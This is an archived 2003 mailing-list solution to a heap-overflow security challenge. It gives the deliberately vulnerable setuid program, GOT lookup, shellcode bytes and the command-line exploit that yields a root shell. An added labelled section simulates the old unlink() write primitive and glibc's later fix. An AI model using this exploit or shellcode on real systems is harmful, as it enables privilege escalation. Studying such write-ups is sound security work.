Re: vulndev1.c solution (warning SPOILER)

From: Jose Ronnick <matrix(at)phiral.com>
Date: Tue May 13 2003 - 21:22:45 EDT

Man... someone's gotta show you guys how it's done... If you want to solve it yourself, don't read any further.

matrix@overdose vuln-dev $ cat vulndev1.c
// vulndev-1.c
// vuln-dev mailing list security challenge #1
// by Aaron Adams <aadams@securityfocus.com>
// Spot the error in this program.

#include <stdio.h>
#include <stdlib.h>
#include <string.h>   /* strncpy */

#define SIZE 252

int
main(int argc, char *argv[])
{
        int     i;
        char    *p1, *p2;
        char    *buf1 = malloc(SIZE);
        char    *buf2 = malloc(SIZE);

        if (argc != 3)
                exit(1);

        p1 = argv[1], p2 = argv[2];
        printf("p1 is at %p\n", p1);  // DEBUG
        strncpy(buf2, p2, SIZE);
        /* i <= SIZE lets the loop write buf1[252], one byte past the 252-byte allocation */
        for (i = 0; i <= SIZE && p1[i] != '\0'; i++)
                buf1[i] = p1[i];
        free(buf1);
        free(buf2);
        return 0;
}
matrix@overdose vuln-dev $ gcc -o vuln1 vulndev1.c 
matrix@overdose vuln-dev $ sudo chown root.root ./vuln1
matrix@overdose vuln-dev $ sudo chmod u+s ./vuln1
matrix@overdose vuln-dev $ objdump -R ./vuln1

./vuln1:     file format elf32-i386

DYNAMIC RELOCATION RECORDS
OFFSET   TYPE              VALUE 
08049654 R_386_GLOB_DAT    __gmon_start__
0804963c R_386_JUMP_SLOT   malloc
08049640 R_386_JUMP_SLOT   __libc_start_main
08049644 R_386_JUMP_SLOT   printf
08049648 R_386_JUMP_SLOT   exit
0804964c R_386_JUMP_SLOT   free
08049650 R_386_JUMP_SLOT   strncpy

matrix@overdose vuln-dev $ pcalc 0x4c-12
        64 0x40 0y1000000
matrix@overdose vuln-dev $ od -ch shell
0000000   1 300 260   F   1 333   1 311 315 200 353 026   [   1 300 210
           c031    46b0    db31    c931    80cd    16eb    315b    88c0
0000020   C  \a 211   [  \b 211   C  \f 260  \v 215   K  \b 215   S  \f
           0743    5b89    8908    0c43    0bb0    4b8d    8d08    0c53
0000040 315 200 350 345 377 377 377   /   b   i   n   /   s   h
           80cd    e5e8    ffff    2fff    6962    2f6e    6873
0000056
matrix@overdose vuln-dev $ wc -c shell
     46 shell
matrix@overdose vuln-dev $ pcalc 252-46
        206 0xce 0y11001110
matrix@overdose vuln-dev $ ./vuln1 `perl -e 'print "A"x206;'``cat shell``printf "\x0b"` `printf "\x40\x96\x04\x08ABCD"`
p1 is at 0xbffff839
Segmentation fault
matrix@overdose vuln-dev $ ./vuln1 `perl -e 'print "A"x206;'``cat shell``printf "\x0b"` `printf "\x40\x96\x04\x08\x39\xf8\xff\xbf"`
p1 is at 0xbffff839
sh-2.05b# id
uid=0(root) gid=100(users) groups=100(users),10(wheel),18(audio)
sh-2.05b#

questions? comments? >=)

-- 
%JOSE_RONNICK%50,:PTX-!399-Purr-!TTTP[XS\-.aa$-do+sP-x121-{Smm-|zq`P-wXqv-kxwx-5yyzP-11B5-0av(-4Gz!P-~]cz-HcayP-YLg/-wyx0-zyx!P-

  • application/pgp-signature attachment: stored
Received on Wed May 14 00:35:20 2003
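Added example, not part of Jose Ronnick's post or of the vulndev challenge code: a simulation of the write primitive the run above depends on. The second argument supplies a forged chunk whose fd is free's GOT entry minus 12 (the "pcalc 0x4c-12" step, giving \x40\x96\x04\x08) and whose bk is the address of p1 (0xbffff839, where the padding and shellcode live). In the allocator of that era, consolidating a chunk on free() ran the unlink() macro on those two pointers with no validation, so FD->bk = BK stored the shellcode address into the GOT slot. The code below runs that historical macro on fake chunks in ordinary memory (the names fake_got_area, fake_argv1 and the helper functions are assumptions for the demonstration; the real heap is never touched) and contrasts it with the pointer check glibc later added, which rejects the same forged chunk.

```c
/* Simulation of the dlmalloc/glibc-2.x unlink() write primitive on fake
 * chunks in plain memory. Added example; nothing here is the page's code. */
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Free-chunk layout of that allocator. fd is at offset 8 and bk at 12 on
 * i386 (hence the post's "0x4c-12"); 16 and 24 on a 64-bit build. */
struct malloc_chunk {
    size_t prev_size;
    size_t size;
    struct malloc_chunk *fd;
    struct malloc_chunk *bk;
};

/* The historical macro: no check that FD and BK point back at P.
 * Named OLD_UNLINK so it does not clash with POSIX unlink(). */
#define OLD_UNLINK(P, BK, FD) { \
    FD = (P)->fd;               \
    BK = (P)->bk;               \
    FD->bk = BK;                \
    BK->fd = FD;                \
}

/* Constructed stand-ins (assumed names): a fake .got region whose middle
 * entry plays free's GOT slot, and a buffer playing argv[1]. The slot sits
 * mid-array so the fake chunk starting offsetof(bk) bytes before it is
 * still inside the same object. */
static void *fake_got_area[8];
static union { unsigned char bytes[64]; void *align_; } fake_argv1;

void **fake_got_slot(void) { return &fake_got_area[4]; }
unsigned char *fake_shellcode(void) { return fake_argv1.bytes; }

/* Forge fd/bk the way the post's second argument does. */
static void forge_chunk(struct malloc_chunk *c, void **target, void *value)
{
    memset(c, 0, sizeof *c);
    c->fd = (struct malloc_chunk *)((char *)target - offsetof(struct malloc_chunk, bk));
    c->bk = (struct malloc_chunk *)value;
}

/* Unchecked unlink on a forged chunk; returns what TARGET holds afterwards. */
void *unlink_write(void **target, void *value)
{
    struct malloc_chunk fake, *BK, *FD;
    forge_chunk(&fake, target, value);
    OLD_UNLINK(&fake, BK, FD);   /* FD->bk = BK  ==> *target = value            */
    return *target;              /* BK->fd = FD  ==> value[offsetof(fd)] = FD   */
}

/* The reflexive write lands sizeof(void *) bytes into VALUE at the fd
 * offset; this reads back what it put there. In the post, the 206 'A'
 * bytes in front of the shellcode absorb that write. */
void *reflexive_write_value(const unsigned char *value)
{
    void *p;
    memcpy(&p, value + offsetof(struct malloc_chunk, fd), sizeof p);
    return p;
}

/* The check glibc later added ("corrupted double-linked list"): both
 * neighbours must point back at P. Returns 1 if unlinked, 0 if rejected. */
int checked_unlink(struct malloc_chunk *p)
{
    struct malloc_chunk *FD = p->fd, *BK = p->bk;
    if (FD->bk != p || BK->fd != p)
        return 0;
    FD->bk = BK;
    BK->fd = FD;
    return 1;
}

/* The same forged chunk against the checked version: rejected, TARGET untouched. */
int checked_unlink_on_forged(void **target, void *value)
{
    struct malloc_chunk fake;
    forge_chunk(&fake, target, value);
    return checked_unlink(&fake);
}

/* Sanity check: a genuinely linked chunk a <-> b <-> c still passes. */
int checked_unlink_on_legit(void)
{
    struct malloc_chunk a = {0}, b = {0}, c = {0};
    a.fd = &b; b.fd = &c; c.bk = &b; b.bk = &a;
    return checked_unlink(&b) && a.fd == &c && c.bk == &a;
}

int main(void)
{
    void **slot = fake_got_slot();
    unlink_write(slot, fake_shellcode());
    printf("GOT slot -> %p, shellcode at %p\n", *slot, (void *)fake_shellcode());
    printf("reflexive write put %p at shellcode+%zu\n",
           reflexive_write_value(fake_shellcode()), offsetof(struct malloc_chunk, fd));
    printf("checked unlink on forged chunk: %d, on legit chunk: %d\n",
           checked_unlink_on_forged(slot, fake_shellcode()), checked_unlink_on_legit());
    return 0;
}
```

The two things worth taking from the simulation: the primitive writes in both directions, so the value you plant (the shellcode address) must tolerate a pointer being dropped into it at the fd offset, which is why the exploit front-loads padding rather than starting argv[1] with the shellcode; and the later "FD->bk != P || BK->fd != P" check defeats exactly this forged-neighbour pattern, which is why the technique stopped working on patched allocators.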
This archive was generated by hypermail 2.1.8 : Wed Aug 23 2006 - 14:07:39 EDT